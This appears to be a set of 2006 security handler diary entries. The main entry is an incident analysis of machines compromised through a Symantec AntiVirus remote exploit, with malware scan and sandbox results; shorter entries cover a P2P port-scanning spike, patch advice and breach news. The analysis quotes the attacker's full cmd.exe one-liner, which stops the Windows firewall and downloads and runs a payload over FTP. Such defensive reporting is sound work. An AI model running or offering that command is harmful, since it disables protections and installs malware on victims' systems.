Last Updated: 2006-12-15 19:13:42 UTC
by donald smith (Version: 2)
This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises were:
Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 22.214.171.124 on tcp port 12345 126.96.36.199 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"
Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.
Running the file through Virustotal gave limited information.
Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET).
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 188.8.131.52 12.14.2006 Win32.Polipos.sus
Fortinet 184.108.40.206 12.14.2006 suspicious
Ikarus T220.127.116.11 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 18.104.22.168 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 22.214.171.124 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
All others reported no virus found!
File size: 12168 bytes
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
John, then reviewed his ids logs looking for traffic on the port 5202 which appears to be the command and control port for this malware and discovered traffic towards 126.96.36.199.
We have requested the cc system and the malware distribution site be shutdown.
I submitted nl.exe to norman and here are the results:
nl.exe.virus : Not detected by Sandbox (Signature: W32/Suspicious_U.gen)
[ General information ]
* File length: 12168 bytes.
* MD5 hash: f538d2c73c7bc7ad084deb8429bd41ef.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\wuauclt.dll.
* Creates file C:\WINDOWS\TEMP\NL055.bat.
[ Process/window information ]
* Enumerates running processes.
* Attemps to NULL C:\WINDOWS\TEMP\NL055.bat NULL.
[ Signature Scanning ]
* C:\WINDOWS\SYSTEM32\wuauclt.dll (23040 bytes) : no signature detection.
* C:\WINDOWS\TEMP\NL055.bat (102 bytes) : no signature detection.
(C) 2004-2006 Norman ASA. All Rights Reserved
We had one report that this virus included a keylogger that has yet to be verified.
Last Updated: 2006-12-14 19:54:23 UTC
by donald smith (Version: 1)
I checked our port statistics and found we had had two spikes one on the 14th of November and
one on the 8th of December.
Nov 14th we saw 62k targets and 143k records with only 105 sources.
That is a 7x increase in records, a 15x increase in targets and the sources went down from the previous day.
On Dec 8th we saw 76k records against 27k targets with only 88 sources.
That is a 3x increase in records, 10x increase in targets and the sources went down from the previous day.
From the user comments on the SANS port statistics:
"There are certain older versions of GhostSurf which fire up by default as a wide-open proxy,"
Write-up on ghostsurf open proxy from November 23, 2005
But based on packets provided by Daniel F. it appears to be p2p related.
Here a write-up by Daniel and packet contents.
"Earlier today a significant increase of port 7212/TCP (unknown) scanning
against relatively large segments from networks in North America,
Sweden, and France was noted.
All probes analyzed thus far appear to be associated with a Peer-to-Peer
(P2P) application framework known as
And two sanitized payloads:
GET /uri-res/N2R?urn:sha1:BJZCBU6KXKEWBY4MXFONNO3T6MYVF67H HTTP/1.1
Host: [targeted darknet address removed]:7212
User-Agent: Fildelarprogram 188.8.131.52 (GnucDNA 184.108.40.206)
Listen-IP: [.se host address removed]:17799
GET /uri-res/N2R?urn:sha1:KONNXKWMSMHIJ7N63HLSPOHG7IPYVV25 HTTP/1.1
Host: [targeted darknet address removed]:7212
User-Agent: morph500 220.127.116.112 (GnucDNA 18.104.22.168)
Listen-IP: [.fr host address removed]:29168
So I did a google for GET /uri-res/N2R?urn:sha1 guess what its all bearshare, limewire and other p2p clients.
So this spike appears to be p2p related not open proxies. But the question on my mind is why so few sources but so many targets?
After a review of the top source IPs it appears most of this is coming from within china.
Last Updated: 2006-12-14 16:14:42 UTC
by Jim Clausing (Version: 2)
We rate this one as important. If someone can get access to the system via other means (cracked password, etc.) this vulnerability allows that person to elevate their privileges to become administrator by running a specially crafted executable.
Last Updated: 2006-12-14 05:20:42 UTC
by Swa Frantzen (Version: 3)
Heise brings us "Offline Update 3.0" to do offline installations of Microsoft patches.
Read more about it at: http://www.heise-security.co.uk/articles/80682
Now this is a great concept. You can actually make a DVD to install the patches before you connect a PC (that's out of date on patches) to the Internet. If you think you can safely do that without this tool, take a second and think it through knowing that some of your friends needing a house call might have a USB connected DSL or cable modem and therefore not be using NAT, next take a look at the survival time and think how long it takes to get a windows system from original media to a fully patched status.
So, if you're going to visit parents, family or friends over the holidays, start your preparation now and make that disk today to take along. It'll improve the obligatory "Could you take a look at our computer while you're here?" response time dramatically and gives you a safe way to reinstall systems without a hardware based firewall.
If you have networks that you do not want to connect to the Internet cause the risks involved of doing that are just too big for the sensitivity of the involved data this might also become a way to patch those off-line machines.
Update: Simon wrote in mentioning AutoPatcher as an alternative solution.
Update: "Mads" reminded us Microsoft makes available ISO images with some of the patches on a monthly basis.
Swa Frantzen -- Section 66
Last Updated: 2006-12-14 00:31:06 UTC
by Kyle Haugsness (Version: 1)
Some major data breaches announced at UCLA and Boeing put the total number of privacy breaches at privacyrights.org since April 2005 to almost 100 million. http://www.privacyrights.org/ar/ChronDataBreaches.htm
New vulnerabilities announced in Symantec NetBackup: http://www.symantec.com/avcenter/security/Content/2006.12.13a.html